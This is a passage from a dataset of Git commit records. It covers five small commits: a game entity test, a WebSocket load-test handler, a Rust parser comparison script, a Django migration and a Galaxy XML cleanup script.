commit
stringlengths 40
40
| old_file
stringlengths 4
118
| new_file
stringlengths 4
118
| old_contents
stringlengths 0
2.94k
| new_contents
stringlengths 1
4.43k
| subject
stringlengths 15
444
| message
stringlengths 16
3.45k
| lang
stringclasses 1
value | license
stringclasses 13
values | repos
stringlengths 5
43.2k
| prompt
stringlengths 17
4.58k
| response
stringlengths 1
4.43k
| prompt_tagged
stringlengths 58
4.62k
| response_tagged
stringlengths 1
4.43k
| text
stringlengths 132
7.29k
| text_tagged
stringlengths 173
7.33k
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
943c8bb558f0a951b190b598f12069d06b6e3041
|
tests/sim/test_entities.py
|
tests/sim/test_entities.py
|
import unittest
from hunting.sim.entities import *
class TestFighter(unittest.TestCase):
def test_base_speed_must_be_positive(self):
with self.assertRaises(ValueError):
Fighter(1, 1, 1, 1, base_speed=-5)
with self.assertRaises(ValueError):
Fighter(1, 1, 1, 1, base_speed=0)
with self.assertRaises(ValueError):
f = Fighter(1, 1, 1, 1)
f.base_speed = -1
with self.assertRaises(ValueError):
f = Fighter(1, 1, 1, 1)
f.base_speed = 0
|
Add test to constrain speed to positive
|
Add test to constrain speed to positive
|
Python
|
mit
|
MoyTW/RL_Arena_Experiment
|
Add test to constrain speed to positive
|
import unittest
from hunting.sim.entities import *
class TestFighter(unittest.TestCase):
def test_base_speed_must_be_positive(self):
with self.assertRaises(ValueError):
Fighter(1, 1, 1, 1, base_speed=-5)
with self.assertRaises(ValueError):
Fighter(1, 1, 1, 1, base_speed=0)
with self.assertRaises(ValueError):
f = Fighter(1, 1, 1, 1)
f.base_speed = -1
with self.assertRaises(ValueError):
f = Fighter(1, 1, 1, 1)
f.base_speed = 0
|
<commit_before><commit_msg>Add test to constrain speed to positive<commit_after>
|
import unittest
from hunting.sim.entities import *
class TestFighter(unittest.TestCase):
def test_base_speed_must_be_positive(self):
with self.assertRaises(ValueError):
Fighter(1, 1, 1, 1, base_speed=-5)
with self.assertRaises(ValueError):
Fighter(1, 1, 1, 1, base_speed=0)
with self.assertRaises(ValueError):
f = Fighter(1, 1, 1, 1)
f.base_speed = -1
with self.assertRaises(ValueError):
f = Fighter(1, 1, 1, 1)
f.base_speed = 0
|
Add test to constrain speed to positiveimport unittest
from hunting.sim.entities import *
class TestFighter(unittest.TestCase):
def test_base_speed_must_be_positive(self):
with self.assertRaises(ValueError):
Fighter(1, 1, 1, 1, base_speed=-5)
with self.assertRaises(ValueError):
Fighter(1, 1, 1, 1, base_speed=0)
with self.assertRaises(ValueError):
f = Fighter(1, 1, 1, 1)
f.base_speed = -1
with self.assertRaises(ValueError):
f = Fighter(1, 1, 1, 1)
f.base_speed = 0
|
<commit_before><commit_msg>Add test to constrain speed to positive<commit_after>import unittest
from hunting.sim.entities import *
class TestFighter(unittest.TestCase):
def test_base_speed_must_be_positive(self):
with self.assertRaises(ValueError):
Fighter(1, 1, 1, 1, base_speed=-5)
with self.assertRaises(ValueError):
Fighter(1, 1, 1, 1, base_speed=0)
with self.assertRaises(ValueError):
f = Fighter(1, 1, 1, 1)
f.base_speed = -1
with self.assertRaises(ValueError):
f = Fighter(1, 1, 1, 1)
f.base_speed = 0
|
|
a3ac011c35fa8918a4828a2c6eb119d5ca18a857
|
src/example/bench_wsh.py
|
src/example/bench_wsh.py
|
# Copyright 2011, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""A simple load tester for WebSocket clients.
A client program sends a message formatted as "<time> <count> <message>" to
this handler. This handler starts sending total <count> WebSocket messages
containing <message> every <time> seconds. <time> can be a floating point
value. <count> must be an integer value.
"""
import time
def web_socket_do_extra_handshake(request):
pass # Always accept.
def web_socket_transfer_data(request):
line = request.ws_stream.receive_message()
parts = line.split(' ')
if len(parts) != 3:
raise ValueError('Bad parameter format')
wait = float(parts[0])
count = int(parts[1])
message = parts[2]
for i in xrange(count):
request.ws_stream.send_message(message)
time.sleep(wait)
# vi:sts=4 sw=4 et
|
Add a handler for performing client load testing.
|
Add a handler for performing client load testing.
Review URL: http://codereview.appspot.com/3844044
|
Python
|
bsd-3-clause
|
google/pywebsocket,googlearchive/pywebsocket,GoogleChromeLabs/pywebsocket3,google/pywebsocket,googlearchive/pywebsocket,GoogleChromeLabs/pywebsocket3,google/pywebsocket,GoogleChromeLabs/pywebsocket3,googlearchive/pywebsocket
|
Add a handler for performing client load testing.
Review URL: http://codereview.appspot.com/3844044
|
# Copyright 2011, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""A simple load tester for WebSocket clients.
A client program sends a message formatted as "<time> <count> <message>" to
this handler. This handler starts sending total <count> WebSocket messages
containing <message> every <time> seconds. <time> can be a floating point
value. <count> must be an integer value.
"""
import time
def web_socket_do_extra_handshake(request):
pass # Always accept.
def web_socket_transfer_data(request):
line = request.ws_stream.receive_message()
parts = line.split(' ')
if len(parts) != 3:
raise ValueError('Bad parameter format')
wait = float(parts[0])
count = int(parts[1])
message = parts[2]
for i in xrange(count):
request.ws_stream.send_message(message)
time.sleep(wait)
# vi:sts=4 sw=4 et
|
<commit_before><commit_msg>Add a handler for performing client load testing.
Review URL: http://codereview.appspot.com/3844044<commit_after>
|
# Copyright 2011, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""A simple load tester for WebSocket clients.
A client program sends a message formatted as "<time> <count> <message>" to
this handler. This handler starts sending total <count> WebSocket messages
containing <message> every <time> seconds. <time> can be a floating point
value. <count> must be an integer value.
"""
import time
def web_socket_do_extra_handshake(request):
pass # Always accept.
def web_socket_transfer_data(request):
line = request.ws_stream.receive_message()
parts = line.split(' ')
if len(parts) != 3:
raise ValueError('Bad parameter format')
wait = float(parts[0])
count = int(parts[1])
message = parts[2]
for i in xrange(count):
request.ws_stream.send_message(message)
time.sleep(wait)
# vi:sts=4 sw=4 et
|
Add a handler for performing client load testing.
Review URL: http://codereview.appspot.com/3844044# Copyright 2011, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""A simple load tester for WebSocket clients.
A client program sends a message formatted as "<time> <count> <message>" to
this handler. This handler starts sending total <count> WebSocket messages
containing <message> every <time> seconds. <time> can be a floating point
value. <count> must be an integer value.
"""
import time
def web_socket_do_extra_handshake(request):
pass # Always accept.
def web_socket_transfer_data(request):
line = request.ws_stream.receive_message()
parts = line.split(' ')
if len(parts) != 3:
raise ValueError('Bad parameter format')
wait = float(parts[0])
count = int(parts[1])
message = parts[2]
for i in xrange(count):
request.ws_stream.send_message(message)
time.sleep(wait)
# vi:sts=4 sw=4 et
|
<commit_before><commit_msg>Add a handler for performing client load testing.
Review URL: http://codereview.appspot.com/3844044<commit_after># Copyright 2011, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""A simple load tester for WebSocket clients.
A client program sends a message formatted as "<time> <count> <message>" to
this handler. This handler starts sending total <count> WebSocket messages
containing <message> every <time> seconds. <time> can be a floating point
value. <count> must be an integer value.
"""
import time
def web_socket_do_extra_handshake(request):
pass # Always accept.
def web_socket_transfer_data(request):
line = request.ws_stream.receive_message()
parts = line.split(' ')
if len(parts) != 3:
raise ValueError('Bad parameter format')
wait = float(parts[0])
count = int(parts[1])
message = parts[2]
for i in xrange(count):
request.ws_stream.send_message(message)
time.sleep(wait)
# vi:sts=4 sw=4 et
|
|
eafd68dd70d24f6e5551e2f59d7c13e4be6dce6e
|
testparser.py
|
testparser.py
|
#!/usr/bin/env python
import sys
import os
import subprocess
# ARGUMENTS:
# 1 - path to the parser executable
# 2 - path to the parser-lalr executable
# 3 - path to the source directory to look for *.rs files
parser = sys.argv[1]
parser_lalr = sys.argv[2]
# flex dies on multibyte characters
BLACKLIST = ['libstd/str.rs', 'libstd/strbuf.rs', 'libstd/ascii.rs']
def chk(*args, **kwargs):
return subprocess.check_output(*args, **kwargs)
def compare(p):
if chk(flex, stdin=open(p)) != chk(rlex, stdin=open(p)):
raise Exception("{} differed between the reference lexer and libsyntax's lexer".format(p))
total = 0
parser_ok = 0
parser_lalr_ok = 0
bad_parser = []
bad_parser_lalr = []
print "\n"
for base, dirs, files in os.walk(sys.argv[3]):
for f in filter(lambda p: p.endswith('.rs'), files):
p = os.path.join(base, f)
if any([p.endswith(b) for b in BLACKLIST]):
continue
total += 1
try:
if len(chk(parser, stdin=open(p), stderr=subprocess.STDOUT)) == 0:
parser_ok += 1
else:
bad_parser.append(p)
except subprocess.CalledProcessError:
bad_parser.append(p)
pass
try:
if "syntax error" not in chk(parser_lalr, stdin=open(p), stderr=subprocess.STDOUT):
parser_lalr_ok += 1
else:
bad_parser_lalr.append(p)
except subprocess.CalledProcessError:
bad_parser_lalr.append(p)
pass
sys.stdout.write("\r total: %d, parser: %d, parser-lalr: %d, scanned %-60s" %
(total, parser_ok, parser_lalr_ok, p))
print "\n"
for (filename, bad, parser) in [("parser.bad", bad_parser, parser),
("parser-lalr.bad", bad_parser_lalr, parser_lalr)]:
print("writing %d files that failed to parse with %s to %s" % (len(bad), parser, filename))
with open(filename, "w") as f:
for p in bad:
f.write(p)
f.write("\n")
|
Add a new test script to evaluate status of different parsers.
|
Add a new test script to evaluate status of different parsers.
|
Python
|
mit
|
patperry/rust-grammar,bleibig/rust-grammar,patperry/rust-grammar,patperry/rust-grammar,bleibig/rust-grammar,bleibig/rust-grammar,patperry/rust-grammar,bleibig/rust-grammar
|
Add a new test script to evaluate status of different parsers.
|
#!/usr/bin/env python
import sys
import os
import subprocess
# ARGUMENTS:
# 1 - path to the parser executable
# 2 - path to the parser-lalr executable
# 3 - path to the source directory to look for *.rs files
parser = sys.argv[1]
parser_lalr = sys.argv[2]
# flex dies on multibyte characters
BLACKLIST = ['libstd/str.rs', 'libstd/strbuf.rs', 'libstd/ascii.rs']
def chk(*args, **kwargs):
return subprocess.check_output(*args, **kwargs)
def compare(p):
if chk(flex, stdin=open(p)) != chk(rlex, stdin=open(p)):
raise Exception("{} differed between the reference lexer and libsyntax's lexer".format(p))
total = 0
parser_ok = 0
parser_lalr_ok = 0
bad_parser = []
bad_parser_lalr = []
print "\n"
for base, dirs, files in os.walk(sys.argv[3]):
for f in filter(lambda p: p.endswith('.rs'), files):
p = os.path.join(base, f)
if any([p.endswith(b) for b in BLACKLIST]):
continue
total += 1
try:
if len(chk(parser, stdin=open(p), stderr=subprocess.STDOUT)) == 0:
parser_ok += 1
else:
bad_parser.append(p)
except subprocess.CalledProcessError:
bad_parser.append(p)
pass
try:
if "syntax error" not in chk(parser_lalr, stdin=open(p), stderr=subprocess.STDOUT):
parser_lalr_ok += 1
else:
bad_parser_lalr.append(p)
except subprocess.CalledProcessError:
bad_parser_lalr.append(p)
pass
sys.stdout.write("\r total: %d, parser: %d, parser-lalr: %d, scanned %-60s" %
(total, parser_ok, parser_lalr_ok, p))
print "\n"
for (filename, bad, parser) in [("parser.bad", bad_parser, parser),
("parser-lalr.bad", bad_parser_lalr, parser_lalr)]:
print("writing %d files that failed to parse with %s to %s" % (len(bad), parser, filename))
with open(filename, "w") as f:
for p in bad:
f.write(p)
f.write("\n")
|
<commit_before><commit_msg>Add a new test script to evaluate status of different parsers.<commit_after>
|
#!/usr/bin/env python
import sys
import os
import subprocess
# ARGUMENTS:
# 1 - path to the parser executable
# 2 - path to the parser-lalr executable
# 3 - path to the source directory to look for *.rs files
parser = sys.argv[1]
parser_lalr = sys.argv[2]
# flex dies on multibyte characters
BLACKLIST = ['libstd/str.rs', 'libstd/strbuf.rs', 'libstd/ascii.rs']
def chk(*args, **kwargs):
return subprocess.check_output(*args, **kwargs)
def compare(p):
if chk(flex, stdin=open(p)) != chk(rlex, stdin=open(p)):
raise Exception("{} differed between the reference lexer and libsyntax's lexer".format(p))
total = 0
parser_ok = 0
parser_lalr_ok = 0
bad_parser = []
bad_parser_lalr = []
print "\n"
for base, dirs, files in os.walk(sys.argv[3]):
for f in filter(lambda p: p.endswith('.rs'), files):
p = os.path.join(base, f)
if any([p.endswith(b) for b in BLACKLIST]):
continue
total += 1
try:
if len(chk(parser, stdin=open(p), stderr=subprocess.STDOUT)) == 0:
parser_ok += 1
else:
bad_parser.append(p)
except subprocess.CalledProcessError:
bad_parser.append(p)
pass
try:
if "syntax error" not in chk(parser_lalr, stdin=open(p), stderr=subprocess.STDOUT):
parser_lalr_ok += 1
else:
bad_parser_lalr.append(p)
except subprocess.CalledProcessError:
bad_parser_lalr.append(p)
pass
sys.stdout.write("\r total: %d, parser: %d, parser-lalr: %d, scanned %-60s" %
(total, parser_ok, parser_lalr_ok, p))
print "\n"
for (filename, bad, parser) in [("parser.bad", bad_parser, parser),
("parser-lalr.bad", bad_parser_lalr, parser_lalr)]:
print("writing %d files that failed to parse with %s to %s" % (len(bad), parser, filename))
with open(filename, "w") as f:
for p in bad:
f.write(p)
f.write("\n")
|
Add a new test script to evaluate status of different parsers.#!/usr/bin/env python
import sys
import os
import subprocess
# ARGUMENTS:
# 1 - path to the parser executable
# 2 - path to the parser-lalr executable
# 3 - path to the source directory to look for *.rs files
parser = sys.argv[1]
parser_lalr = sys.argv[2]
# flex dies on multibyte characters
BLACKLIST = ['libstd/str.rs', 'libstd/strbuf.rs', 'libstd/ascii.rs']
def chk(*args, **kwargs):
return subprocess.check_output(*args, **kwargs)
def compare(p):
if chk(flex, stdin=open(p)) != chk(rlex, stdin=open(p)):
raise Exception("{} differed between the reference lexer and libsyntax's lexer".format(p))
total = 0
parser_ok = 0
parser_lalr_ok = 0
bad_parser = []
bad_parser_lalr = []
print "\n"
for base, dirs, files in os.walk(sys.argv[3]):
for f in filter(lambda p: p.endswith('.rs'), files):
p = os.path.join(base, f)
if any([p.endswith(b) for b in BLACKLIST]):
continue
total += 1
try:
if len(chk(parser, stdin=open(p), stderr=subprocess.STDOUT)) == 0:
parser_ok += 1
else:
bad_parser.append(p)
except subprocess.CalledProcessError:
bad_parser.append(p)
pass
try:
if "syntax error" not in chk(parser_lalr, stdin=open(p), stderr=subprocess.STDOUT):
parser_lalr_ok += 1
else:
bad_parser_lalr.append(p)
except subprocess.CalledProcessError:
bad_parser_lalr.append(p)
pass
sys.stdout.write("\r total: %d, parser: %d, parser-lalr: %d, scanned %-60s" %
(total, parser_ok, parser_lalr_ok, p))
print "\n"
for (filename, bad, parser) in [("parser.bad", bad_parser, parser),
("parser-lalr.bad", bad_parser_lalr, parser_lalr)]:
print("writing %d files that failed to parse with %s to %s" % (len(bad), parser, filename))
with open(filename, "w") as f:
for p in bad:
f.write(p)
f.write("\n")
|
<commit_before><commit_msg>Add a new test script to evaluate status of different parsers.<commit_after>#!/usr/bin/env python
import sys
import os
import subprocess
# ARGUMENTS:
# 1 - path to the parser executable
# 2 - path to the parser-lalr executable
# 3 - path to the source directory to look for *.rs files
parser = sys.argv[1]
parser_lalr = sys.argv[2]
# flex dies on multibyte characters
BLACKLIST = ['libstd/str.rs', 'libstd/strbuf.rs', 'libstd/ascii.rs']
def chk(*args, **kwargs):
return subprocess.check_output(*args, **kwargs)
def compare(p):
if chk(flex, stdin=open(p)) != chk(rlex, stdin=open(p)):
raise Exception("{} differed between the reference lexer and libsyntax's lexer".format(p))
total = 0
parser_ok = 0
parser_lalr_ok = 0
bad_parser = []
bad_parser_lalr = []
print "\n"
for base, dirs, files in os.walk(sys.argv[3]):
for f in filter(lambda p: p.endswith('.rs'), files):
p = os.path.join(base, f)
if any([p.endswith(b) for b in BLACKLIST]):
continue
total += 1
try:
if len(chk(parser, stdin=open(p), stderr=subprocess.STDOUT)) == 0:
parser_ok += 1
else:
bad_parser.append(p)
except subprocess.CalledProcessError:
bad_parser.append(p)
pass
try:
if "syntax error" not in chk(parser_lalr, stdin=open(p), stderr=subprocess.STDOUT):
parser_lalr_ok += 1
else:
bad_parser_lalr.append(p)
except subprocess.CalledProcessError:
bad_parser_lalr.append(p)
pass
sys.stdout.write("\r total: %d, parser: %d, parser-lalr: %d, scanned %-60s" %
(total, parser_ok, parser_lalr_ok, p))
print "\n"
for (filename, bad, parser) in [("parser.bad", bad_parser, parser),
("parser-lalr.bad", bad_parser_lalr, parser_lalr)]:
print("writing %d files that failed to parse with %s to %s" % (len(bad), parser, filename))
with open(filename, "w") as f:
for p in bad:
f.write(p)
f.write("\n")
|
|
3cb168f79a5239068f5ed0c3fa51f530f4a37f05
|
members/crm/migrations/0014_auto_20190117_0402.py
|
members/crm/migrations/0014_auto_20190117_0402.py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.14 on 2019-01-17 04:02
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('crm', '0013_profile_squashed'),
]
operations = [
migrations.RemoveField(
model_name='profile',
name='user',
),
migrations.DeleteModel(
name='Profile',
),
]
|
Remove profile until QBO integration gets merged in
|
Remove profile until QBO integration gets merged in
|
Python
|
mit
|
ocwc/ocwc-members,ocwc/ocwc-members,ocwc/ocwc-members,ocwc/ocwc-members
|
Remove profile until QBO integration gets merged in
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.14 on 2019-01-17 04:02
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('crm', '0013_profile_squashed'),
]
operations = [
migrations.RemoveField(
model_name='profile',
name='user',
),
migrations.DeleteModel(
name='Profile',
),
]
|
<commit_before><commit_msg>Remove profile until QBO integration gets merged in<commit_after>
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.14 on 2019-01-17 04:02
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('crm', '0013_profile_squashed'),
]
operations = [
migrations.RemoveField(
model_name='profile',
name='user',
),
migrations.DeleteModel(
name='Profile',
),
]
|
Remove profile until QBO integration gets merged in# -*- coding: utf-8 -*-
# Generated by Django 1.11.14 on 2019-01-17 04:02
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('crm', '0013_profile_squashed'),
]
operations = [
migrations.RemoveField(
model_name='profile',
name='user',
),
migrations.DeleteModel(
name='Profile',
),
]
|
<commit_before><commit_msg>Remove profile until QBO integration gets merged in<commit_after># -*- coding: utf-8 -*-
# Generated by Django 1.11.14 on 2019-01-17 04:02
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('crm', '0013_profile_squashed'),
]
operations = [
migrations.RemoveField(
model_name='profile',
name='user',
),
migrations.DeleteModel(
name='Profile',
),
]
|
|
a7ff8375e945a7522ede57ef98c130b40aaf98b0
|
helper_scripts/clean_tool_conf_xml.py
|
helper_scripts/clean_tool_conf_xml.py
|
#!/usr/bin/env python
## Example usage: python clean_tool_conf.py -i /galaxy/config/shed_tool_conf.xml -o clean_shed_tool_conf.xml
import xml.etree.ElementTree as ET
from os import path
from argparse import ArgumentParser
def check_child(root, children, tooldir, removed_tools = []):
"""
For each child in children, check if child is tool. If it does not, check
if child is section. If it is, recurse into section.
If it has a file attribute, check if the path exists, else remove child from root.
"""
for child in children:
if child.tag == "section":
check_child(root = children,
children = child.getchildren(),
tooldir = tooldir,
removed_tools = removed_tools)
elif child.tag == "tool":
if path.exists( path.join (tooldir, child.attrib["file"])):
pass
else:
children.remove(child)
removed_tools.append(child.attrib["file"])
return removed_tools
def _parse_cli_options():
"""
Parse command line options, returning `parse_args` from `ArgumentParser`.
"""
parser = ArgumentParser(usage="usage: python %(prog)s <options>")
parser.add_argument("-i", "--input",
dest="input_xml",
required=True,
help="shed_tool_conf.xml or migrated_tool_conf.xml \
that needs to be cleaned from non-existant entries." )
parser.add_argument("-o", "--output_xml",
required=True,
dest="output_xml",
help="Output file for cleaned xml")
return parser.parse_args()
def __main__():
args = _parse_cli_options()
input_xml=args.input_xml
output_xml=args.output_xml
tree = ET.parse(input_xml)
root = tree.getroot()
tooldir = root.attrib["tool_path"]
children = root.getchildren()
removed_tools = check_child(root, children, tooldir)
print "tool xml not found for the follwing tools, removing entries from output xml:"
for tool in removed_tools:
print tool
with open(output_xml, "w") as output:
output.write(ET.tostring(root))
if __name__ == "__main__":
__main__()
|
Add script that removes non-existent xml entries from shed_tool_conf.xml and migrated_tool_conf.xml
|
Add script that removes non-existent xml entries from shed_tool_conf.xml and migrated_tool_conf.xml
|
Python
|
mit
|
ARTbio/tools-artbio,ARTbio/tools-artbio,mvdbeek/tools-artbio,JuPeg/tools-artbio,chamaelj/tools-artbio,JuPeg/tools-artbio,chamaelj/tools-artbio,drosofff/tools-artbio,ARTbio/tools-artbio,drosofff/tools-artbio,drosofff/tools-artbio,ARTbio/tools-artbio,mvdbeek/tools-artbio,drosofff/tools-artbio,chamaelj/tools-artbio
|
Add script that removes non-existent xml entries from shed_tool_conf.xml and migrated_tool_conf.xml
|
#!/usr/bin/env python
## Example usage: python clean_tool_conf.py -i /galaxy/config/shed_tool_conf.xml -o clean_shed_tool_conf.xml
import xml.etree.ElementTree as ET
from os import path
from argparse import ArgumentParser
def check_child(root, children, tooldir, removed_tools = []):
"""
For each child in children, check if child is tool. If it does not, check
if child is section. If it is, recurse into section.
If it has a file attribute, check if the path exists, else remove child from root.
"""
for child in children:
if child.tag == "section":
check_child(root = children,
children = child.getchildren(),
tooldir = tooldir,
removed_tools = removed_tools)
elif child.tag == "tool":
if path.exists( path.join (tooldir, child.attrib["file"])):
pass
else:
children.remove(child)
removed_tools.append(child.attrib["file"])
return removed_tools
def _parse_cli_options():
"""
Parse command line options, returning `parse_args` from `ArgumentParser`.
"""
parser = ArgumentParser(usage="usage: python %(prog)s <options>")
parser.add_argument("-i", "--input",
dest="input_xml",
required=True,
help="shed_tool_conf.xml or migrated_tool_conf.xml \
that needs to be cleaned from non-existant entries." )
parser.add_argument("-o", "--output_xml",
required=True,
dest="output_xml",
help="Output file for cleaned xml")
return parser.parse_args()
def __main__():
args = _parse_cli_options()
input_xml=args.input_xml
output_xml=args.output_xml
tree = ET.parse(input_xml)
root = tree.getroot()
tooldir = root.attrib["tool_path"]
children = root.getchildren()
removed_tools = check_child(root, children, tooldir)
print "tool xml not found for the follwing tools, removing entries from output xml:"
for tool in removed_tools:
print tool
with open(output_xml, "w") as output:
output.write(ET.tostring(root))
if __name__ == "__main__":
__main__()
|
<commit_before><commit_msg>Add script that removes non-existent xml entries from shed_tool_conf.xml and migrated_tool_conf.xml<commit_after>
|
#!/usr/bin/env python
## Example usage: python clean_tool_conf.py -i /galaxy/config/shed_tool_conf.xml -o clean_shed_tool_conf.xml
import xml.etree.ElementTree as ET
from os import path
from argparse import ArgumentParser
def check_child(root, children, tooldir, removed_tools = []):
"""
